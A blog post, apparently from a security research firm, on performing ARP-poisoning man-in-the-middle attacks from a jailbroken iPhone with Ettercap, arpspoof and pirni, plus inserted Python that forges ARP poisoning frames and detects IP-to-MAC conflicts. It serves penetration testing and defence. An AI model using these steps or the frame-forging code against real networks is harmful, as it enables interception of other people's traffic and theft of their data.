Monday, July 2, 2012

iPhone: MiTM attack out of a pocket

A laptop is the typical device for Wi-Fi attacks, for several reasons: support for specific Wi-Fi adapters, availability of the necessary software and sufficient computing power. So we usually picture the attacker holding a laptop while sitting in a car with an antenna sticking out of the window. Mobile platforms are moving forward, however, and a lot of these operations can now be performed straight from a pocket.

Many of us use Apple devices running iOS. It is no secret that iOS belongs to the *nix family and therefore inherits its advantages, including the availability of various classic pentest tools. This time I want to look at tools for conducting simple Man-in-the-Middle attacks against Wi-Fi clients using ARP poisoning.

Unfortunately, this can be done only on jailbroken devices. For the purposes of this article, the jailbreak is needed to access third-party libraries and tools that are distributed only via alternative repositories.

Cydia will be used to install the applications. I won't target a specific iOS release; these tools work on versions 4.x and 5.x. First of all, install the packet-capture library libpcap. It is in the default repository, and its installation should pose no problems. This library is what the popular traffic-interception tools below depend on.

Keep in mind that console access to the device is a must for most of these programs. It can be obtained via OpenSSH from Cydia together with a third-party client, for example iSSH from the App Store, or with the local Terminal application, also installed from Cydia. Note that these applications first require the Berkeley DB libraries from the default repository to be installed.

Secondly, add TheWorm repository, which contains the necessary utilities. Additional information about adding new repositories is available here.

I think the most interesting iOS tool for traffic interception is Ettercap, which is convenient and lets you carry out every step of the attack from a single program. It is popular enough that usage examples are easy to find; there is even a demonstration video. With the local Terminal you are limited to the text-only interface, whereas over iSSH the full curses interface, started with ettercap -C, is available. The range of functions lets you run a proper attack and analyze the traffic without leaving the spot. The only drawback is how awkward console work is on a mobile device, but the capabilities more than make up for it.

If you want finer control over the spoofing and interception, the utilities in the dsniff package will suit you. It includes arpspoof and dsniff, which are all you need for an ARP poisoning attack: enable IP forwarding on the device first (otherwise the victim simply loses connectivity once its gateway entry is poisoned), then run arpspoof against the victim and the gateway in both directions while a capture tool collects the traffic. If you don't know these tools, read their man pages first.

I think this set is good for collecting pcap data on the phone and analyzing it later on a PC with tools such as NetworkMiner or Wireshark. To transfer the files, use WinSCP, Fugu or whatever is convenient for you. All in all, this set of applications is sufficient, even excessive, for testing a network's resistance to ARP poisoning.
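As an added example (not part of the original post, and not code from dsniff, ettercap or pirni), the following Python builds the same pair of forged ARP replies that arpspoof repeats to the victim and the gateway, parses ARP frames back out of raw Ethernet bytes, and runs a simple detector over a captured sequence that flags any IP address claimed by two different MACs, which is the signature you look for when testing a network's resistance to ARP poisoning. All MAC and IP addresses are constructed for illustration; the send_frame helper assumes a Linux AF_PACKET raw socket and root privileges and is never called here.

```python
"""ARP-poisoning frames and a simple IP-to-MAC conflict detector.

Added example, not from the original post or from dsniff/ettercap/pirni.
All addresses below are constructed for illustration.
"""
import socket
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST = 1
ARP_REPLY = 2


def mac_bytes(mac):
    return bytes(int(x, 16) for x in mac.split(":"))


def ip_bytes(ip):
    return bytes(int(x) for x in ip.split("."))


def fmt_mac(raw):
    return ":".join("%02x" % b for b in raw)


def fmt_ip(raw):
    return ".".join(str(b) for b in raw)


def build_arp(op, sender_mac, sender_ip, target_mac, target_ip):
    """Build a 42-byte Ethernet+ARP frame addressed to target_mac."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    # htype=Ethernet(1), ptype=IPv4, hlen=6, plen=4, opcode
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp


def poison_pair(attacker_mac, victim_mac, victim_ip, gateway_mac, gateway_ip):
    """The two unsolicited replies arpspoof repeats each round:
    the victim learns gateway_ip -> attacker_mac,
    the gateway learns victim_ip -> attacker_mac."""
    to_victim = build_arp(ARP_REPLY, attacker_mac, gateway_ip, victim_mac, victim_ip)
    to_gateway = build_arp(ARP_REPLY, attacker_mac, victim_ip, gateway_mac, gateway_ip)
    return to_victim, to_gateway


def send_frame(iface, frame):
    """Put a frame on the wire. Assumes root and a Linux AF_PACKET socket
    (assumption; not called in this example)."""
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW) as s:
        s.bind((iface, 0))
        s.send(frame)


def parse_arp(frame):
    """Return the ARP fields of an Ethernet frame, or None if it is not
    IPv4-over-Ethernet ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {
        "op": op,
        "sender_mac": fmt_mac(frame[22:28]),
        "sender_ip": fmt_ip(frame[28:32]),
        "target_mac": fmt_mac(frame[32:38]),
        "target_ip": fmt_ip(frame[38:42]),
    }


def detect_poisoning(frames):
    """Walk captured frames in order and report every ARP reply whose sender IP
    was previously bound to a different MAC, as (ip, first_mac, new_mac)."""
    bindings = {}
    alerts = []
    for frame in frames:
        p = parse_arp(frame)
        if p is None or p["op"] != ARP_REPLY:
            continue
        ip, mac = p["sender_ip"], p["sender_mac"]
        first = bindings.setdefault(ip, mac)
        if first != mac:
            alerts.append((ip, first, mac))
    return alerts


if __name__ == "__main__":
    # Constructed lab addresses: a gateway, a victim and the attacking phone.
    GATEWAY_MAC, GATEWAY_IP = "02:00:00:00:00:01", "192.168.1.1"
    VICTIM_MAC, VICTIM_IP = "02:00:00:00:00:bb", "192.168.1.10"
    ATTACKER_MAC = "02:00:00:00:00:aa"
    legit = build_arp(ARP_REPLY, GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)
    to_victim, to_gateway = poison_pair(ATTACKER_MAC, VICTIM_MAC, VICTIM_IP,
                                        GATEWAY_MAC, GATEWAY_IP)
    for ip, first, new in detect_poisoning([legit, to_victim, to_gateway]):
        print("ARP conflict: %s was %s, now claimed by %s" % (ip, first, new))
```

The detector is deliberately order-sensitive: it trusts the first binding it sees for each IP, so it should be run on a capture that starts before the attack, or seeded from a known-good table. In a real capture the victim's own ARP replies would also appear, and the forged reply to the gateway would then trigger a second alert for the victim's address.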

The third and last tool I want to dwell on is pirni, a traffic interceptor developed specifically for iOS. It performs the classic interception and packet-analysis functions: attacking the ARP table of one or several hosts, collecting traffic and analyzing it through filters. It comes in two versions: open-source pirni and Pirni Pro, a paid graphical utility that is quite easy to use. Results are saved in pcap format for later analysis. The graphical version reduces the whole attack to a single tap. It has a built-in traffic filter based on regular expressions that shows matches in real time, plus a minimal set of scan settings. With correctly written regular expressions, the results appear on the device's screen instantly.

Finally, I want to note that there are many iOS utilities for conducting the simplest Wi-Fi attacks. Such use of a phone may be considered improper, but it has a right to exist.
Thank you for your attention! I hope you've learnt something new.

Author: Kirill Ermakov, Positive Research